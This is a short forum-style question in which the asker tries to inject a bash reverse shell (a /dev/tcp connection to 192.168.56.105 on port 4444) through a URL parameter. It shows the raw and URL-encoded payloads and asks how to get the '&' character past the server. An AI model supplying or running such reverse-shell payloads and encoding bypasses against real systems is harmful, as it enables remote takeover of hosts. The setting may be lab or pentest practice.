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I try to put bash reverse shell as a URL parameter. The command is as follows:

bash -i >& /dev/tcp/192.168.56.105/4444 0>&1

I have encoded the above code with URL encoding

bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.105%2F4444%200%3E%261

But still, the problem is in interpreting the "&" character. Do you have any other tips on how to bypass/encode "&" char and use a bash reverse shell?

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